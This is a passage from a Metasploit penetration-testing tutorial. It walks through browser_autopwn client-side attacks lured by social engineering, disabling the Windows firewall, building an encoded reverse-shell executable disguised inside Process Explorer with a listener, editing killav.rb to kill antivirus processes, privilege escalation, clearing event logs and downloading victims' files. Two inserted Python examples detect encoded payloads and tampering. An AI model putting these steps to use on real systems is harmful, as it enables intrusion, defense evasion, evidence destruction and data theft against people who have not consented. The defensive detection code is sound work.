    In the above exploitation we had no firewall running on the victim machine and hence everything went smooth and easy, but in today's world people have become smart enough to use at least the default windows firewall.

    Now, if the firewall is up and running then there is no way that an attacker can break into the victim machine this way.

    The only solution to evade a firewall can be a reverse connection from the victim to the attacker. But how is that possible?

    Here comes something called CLIENT SIDE EXPLOITATION.

    A client side exploit takes advantage of vulnerabilities found in applications the victim is running. It requires a little bit of social engineering.

    In our demonstration we will take a look at browser based client side exploitation, because browsers are not something that is updated as regularly as the operating system.

  • We would set up an attack web server which would load a ton of browser based exploits, and when the victim connects to the server, we can get control over the victim.

    Let's start:

    - We have turned the windows firewall ON.

    Figure 61 Windows Firewall

  • STEP 1:

    -> We will be using one of the auxiliary modules called browser autopwn.

    -> To set the module use the following command:

    Figure 62 Set Auxiliary Module

    STEP 2:

    -> Set the options required for the above exploit.

    Figure 63 Show Auxiliary Options

    Figure 64 Set Auxiliary Options

  • STEP 3:

    -> Run the server using the run command.

    msf auxiliary(browser_autopwn) > run

    This would start a server and load all the browser based exploits onto the server.

    It is a little time consuming, so be patient and wait for all the exploits to load.

    Figure 65 Loading Modules to Server

  • STEP 4:

    -> Now after you see "Server started" on your terminal, convince the victim by some means or misguide him/her to connect to the attacker's ip address from the browser.

    -> Social engineering would do best.

    -> It does not show anything to the victim, as if nothing happened, but back on the attacker machine the server has executed its own code.

    Figure 66 Victim's Browser

    -> As soon as the victim puts the ip address in the browser the following code is executed by the server.

    Figure 67 Execution of Exploit

  • -> To use the session that has been created by the server use the following commands.

    Figure 68 Using the created Session

    -> Now what we have running is a meterpreter session. We would take a look at it in the later chapters.

  • PART 2: KILLING WINDOWS FIREWALL

    To kill the windows firewall we need a command prompt, but as you can see we have meterpreter as the payload instead.

    To get a command prompt from meterpreter execute the following command:

    meterpreter > execute -f cmd.exe -c -H

    Figure 69 Execute command of Meterpreter

    -> Next we need to execute the following command from the command prompt to disable the firewall.

    Figure 70 Disabling the Windows Firewall

    The windows firewall immediately turns off and no longer blocks any kind of connection.

  • PART 3: Evading Antivirus

    Most payloads and exploits that we have created until now would at some point or the other create temporary files on the victim machines, and hence good anti viruses would eventually raise an alarm.

    To prevent this from happening we would have to take certain measures.

    Evading antivirus is a somewhat complex job and hence we will take a look at it step by step.

    We will be using three different concepts together so that there is no chance of an antivirus detecting the connection.

    We will be creating a standalone payload using MSF Payload. This payload will then be encoded using the MSF Encode module. And we will apply a custom template so that it does not raise any suspicion.

    After all this is done, we will create a listener on our machine which will wait for the connection from the victim.

    Step 1:

    -> Download process explorer as we will be using process explorer as the custom template.

    -> Download it and extract it.

    Figure 71 Unzipping Process Explorer

  • Step 2:

    -> Execute the following command (msfpayload options are given as NAME=value, so LPORT needs the = sign):

    root@bt:/opt/metasploit/msf3# msfpayload windows/shell_reverse_tcp LHOST=x.x.x.x LPORT=8080 R | msfencode -t exe -x processexp/procexp.exe -o /root/Desktop/file_name.exe -e x86/shikata_ga_nai -c 10

    Figure 72 Encoding

    -> This would create a file on the desktop with the name given to -o (Process Exp.exe in the figure).

    Figure 73 Process Explorer

    Step 3:

    -> The next step is to send the file we recently created to the victim.

    -> And simultaneously we need to set up a listener on our machine.

    -> We will be setting up a listener using msfcli which would listen for incoming connections.

  • -> Execute the following command to set up a listener.

    root@bt:/opt/metasploit/msf3# msfcli exploit/multi/handler PAYLOAD=windows/shell_reverse_tcp LHOST=192.168.254.132 LPORT=8080 E

    Figure 74 Launching Listener

    -> After executing the command wait for the victim to run the file we sent.

    Figure 75 Encoded File on Victim Machine
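    Encoding the payload and wrapping it in a legitimate template defeats a static signature for the original shellcode, but it leaves two marks a defender can look for: the template's file hash and digital signature no longer match the vendor's, and the encoded blob itself is close to random, so it stands out against the low-entropy code and strings of the executable it was injected into. The script below is an added example, not from the tutorial or Metasploit, that implements the second check, a per-chunk Shannon entropy scan, over a constructed buffer (ordinary text with a deterministic pseudo-random region spliced in, standing in for a real binary).

```python
"""Locate high-entropy regions in a file, a common packer/encoder tell.

Added example (not from the tutorial or Metasploit). The buffers below are
constructed: a mostly-text file with a pseudo-random region spliced in,
not a real executable.
"""
import hashlib
import math
from collections import Counter


def shannon_entropy(data):
    """Bits of entropy per byte: 0.0 for a constant buffer, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = Counter(data)
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def high_entropy_regions(data, chunk=1024, threshold=7.0):
    """Return (offset, entropy) for each chunk at or above the threshold.

    Compiled code and ASCII sit well below 7 bits/byte; compressed or
    encoded data sits above it. Chunks of 1 KiB keep the estimate stable
    (with only 256 bytes per chunk even random data reads ~7.2 bits).
    """
    regions = []
    for off in range(0, len(data), chunk):
        ent = shannon_entropy(data[off:off + chunk])
        if ent >= threshold:
            regions.append((off, round(ent, 2)))
    return regions


def pseudo_random_bytes(n, seed=b"constructed-sample"):
    """Deterministic high-entropy filler (SHA-256 chain), so runs are repeatable."""
    out = bytearray()
    block = seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out.extend(block)
    return bytes(out[:n])


def build_sample():
    """Constructed 'binary': 2 KiB of text, 2 KiB encoded-looking blob, 1 KiB of text."""
    text = (b"This is ordinary program text and strings. " * 64)[:2048]
    return text + pseudo_random_bytes(2048) + text[:1024]


if __name__ == "__main__":
    sample = build_sample()
    for off, ent in high_entropy_regions(sample):
        print(f"offset {off:#06x}: {ent} bits/byte")
```

    On the sample only the two chunks covering the spliced-in blob are reported. Entropy alone is a heuristic (legitimate compressed resources and installers score high too), so in practice it is combined with the hash and signature check against the vendor's original.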

  • -> As soon as the victim executes the standalone payload, we get a command prompt of the victim.

    Figure 76 Execution of Exploit

    Part 4: Killing Antivirus

    -> To kill an antivirus we need to use the meterpreter payload. We will take a look at the complete meterpreter in detail in the upcoming chapters.

    -> After we have successfully evaded the antivirus, the next most important thing to do is to kill the antivirus.

    -> Make sure to use the meterpreter payload.

    Figure 77 Searching Meterpreter

  • Figure 78 Setting Exploit and Payload

    Figure 79 Exploiting

    -> To take a look at all the options of meterpreter:

    meterpreter > ?

    This would display a huge list of options that come along with meterpreter. Meterpreter allows the attacker to execute scripts on the victim machine, and one of those scripts is killav.rb.

  • killav.rb is a ruby script that can be executed remotely from the attacker machine to shut down the antivirus. Though this script does not guarantee 100% success, making a few changes to the script ourselves would make it work perfectly.

    Step 1:

    -> After getting access through meterpreter, check the list of all processes running on the system using the ps command.

    meterpreter > ps

    Figure 80 PS command

    From the list note down all the processes that are associated with the antivirus.

    avgwdsvc.exe

    avgui.exe

    avgidsagent.exe

    avgrsx.exe

    avgcsrvx.exe

    The killav.rb script searches for antivirus processes from a list.

  • Step 2:

    All we need to do is to edit the killav.rb script and add these processes to it.

    To edit the script go to the following directory.

    Figure 81 Opening Killav

    Figure 82 Editing Killav.rb

    -> Save the script and quit.

  • Step 3:

    -> Go back to meterpreter and execute the script using the run command.

    Figure 83 Running the Script

  • CHAPTER 8

    POST EXPLOITATION MODULE

    Meterpreter initially was just a payload, but as time passed it evolved into a post exploitation tool, because of its wide range of functionalities. Single payloads could perform only specific tasks, for example adding a new user or giving a command shell to the attacker, but meterpreter creates a platform for the attacker on the victim machine to execute different programs.

    Apart from that, the main reason for such widespread use of meterpreter is that it does not create a temporary file on the victim, whereas the other payloads do. Creation of a temporary file may create suspicion and may even be detected by antivirus or host based Intrusion Detection Systems.

    Meterpreter uses an encrypted communication channel.

    Meterpreter does not create a new process in RAM either; it gets itself executed under a system parent process.

  • Phases of Post Exploitation:

    -> Understanding the victim

    -> Privilege Escalation

    -> Collecting Data

    -> Deleting Logs

  • 1. Understanding the Victim Better:

    Using the help command would give us the list of commands in meterpreter.

    -> System Information

    Figure 84 System Information

    -> User ID

    Figure 85 Getuid

    -> Getting the list of processes currently running

    Figure 86 List of Processes Running

  • -> Idle Time

    Figure 87 System Idle Time

    -> Check if the system is a Virtual Machine

    Figure 88 Check for a Virtual Machine

    -> List of Meterpreter Scripts Available

    Figure 89 Meterpreter Scripts

  • -> Get Environment

    Figure 90 Get Environment

    -> Get Application List

    Figure 91 List of Applications Running

  • -> Dumping complete system information

    Figure 92 Complete System Information

    -> The directory in which the data is dumped.

    Figure 93 Dump

  • Figure 94 Data dump Files

  • Privilege Escalation

    Carrying out privilege escalation is very simple in meterpreter. It has an inbuilt script called getsystem which gives you administrative privileges if executed.

    Figure 95 Get System

    Clearing Logs:

    -> Clearing Event logs

    Figure 96 Clear Event Logs
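    Two of the steps shown in this tutorial leave footprints that a monitoring host can catch: the antivirus processes listed in Chapter 7 Part 4 disappearing from the process table after killav.rb runs, and the event logs being cleared as shown in Figure 96. The script below is an added example, not from the tutorial, killav.rb or Meterpreter, that checks both over constructed data: two process snapshots in the style of a ps listing (the AV process names are the AVG ones from Chapter 7) and a few event records in the shape a log forwarder would produce. The event IDs used are the documented Windows ones for a cleared log: 517 in the Security log on Windows 2000/XP/2003, and 1102 (Security) and 104 (System) on Vista and later.

```python
"""Spot two post-exploitation tamper indicators: antivirus processes that
vanish from the process table, and event records that show a log was cleared.

Added example (not from the tutorial, killav.rb or Meterpreter). The
snapshots and event records below are constructed sample data.
"""

# AV processes listed in Chapter 7 Part 4; any of these missing is a signal
EXPECTED_AV_PROCESSES = {
    "avgwdsvc.exe", "avgui.exe", "avgidsagent.exe", "avgrsx.exe", "avgcsrvx.exe",
}

# (event_id, log) pairs that Windows writes when a log is cleared; the
# clear event itself is the last thing left in the freshly emptied log.
LOG_CLEARED_EVENTS = {
    (517, "Security"): "audit log cleared (Windows 2000/XP/2003)",
    (1102, "Security"): "audit log cleared (Vista and later)",
    (104, "System"): "system log cleared (Vista and later)",
}

# Constructed process snapshots (process names from a ps-style listing).
SNAPSHOT_BEFORE = {
    "system", "smss.exe", "csrss.exe", "winlogon.exe", "services.exe",
    "lsass.exe", "svchost.exe", "explorer.exe", "avgwdsvc.exe",
    "avgui.exe", "avgidsagent.exe", "avgrsx.exe", "avgcsrvx.exe",
}
SNAPSHOT_AFTER = {
    "system", "smss.exe", "csrss.exe", "winlogon.exe", "services.exe",
    "lsass.exe", "svchost.exe", "explorer.exe", "avgwdsvc.exe",
}

# Constructed event records; 528 (logon) and 7036 (service state change)
# are ordinary XP-era events included as benign noise.
SAMPLE_EVENTS = [
    {"time": "2015-01-15T10:30:00", "log": "Security", "event_id": 528, "user": "vivek"},
    {"time": "2015-01-15T10:31:10", "log": "System", "event_id": 7036, "user": "SYSTEM"},
    {"time": "2015-01-15T10:33:45", "log": "Security", "event_id": 517, "user": "SYSTEM"},
    {"time": "2015-01-15T10:33:46", "log": "System", "event_id": 104, "user": "SYSTEM"},
]


def missing_av_processes(snapshot, expected=EXPECTED_AV_PROCESSES):
    """Sorted names of expected AV processes absent from a snapshot."""
    return sorted(expected - {p.lower() for p in snapshot})


def av_health(before, after, expected=EXPECTED_AV_PROCESSES):
    """Alert when AV processes present in the earlier snapshot are gone in the later one."""
    was_missing = set(missing_av_processes(before, expected))
    now_missing = set(missing_av_processes(after, expected))
    gone = sorted(now_missing - was_missing)
    return {"alert": bool(gone), "terminated": gone}


def log_clear_events(events):
    """Return (event, description) for every record that marks a cleared log."""
    hits = []
    for ev in events:
        desc = LOG_CLEARED_EVENTS.get((ev["event_id"], ev["log"]))
        if desc:
            hits.append((ev, desc))
    return hits


if __name__ == "__main__":
    print(av_health(SNAPSHOT_BEFORE, SNAPSHOT_AFTER))
    for ev, desc in log_clear_events(SAMPLE_EVENTS):
        print(f"{ev['time']} {ev['log']} {ev['event_id']}: {desc}")
```

    Both checks only help if the evidence leaves the host before it is destroyed: a clear event written into an emptied local log is trivial to clear again, so the records and process snapshots are meant to be forwarded to a collector the compromised machine cannot touch.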

  • Collecting Data:

    -> Meterpreter comes with an option for uploading and downloading files. To download files go to the directories and download using the download script of meterpreter.

    Figure 97 List of Files

    Figure 98 Download Files
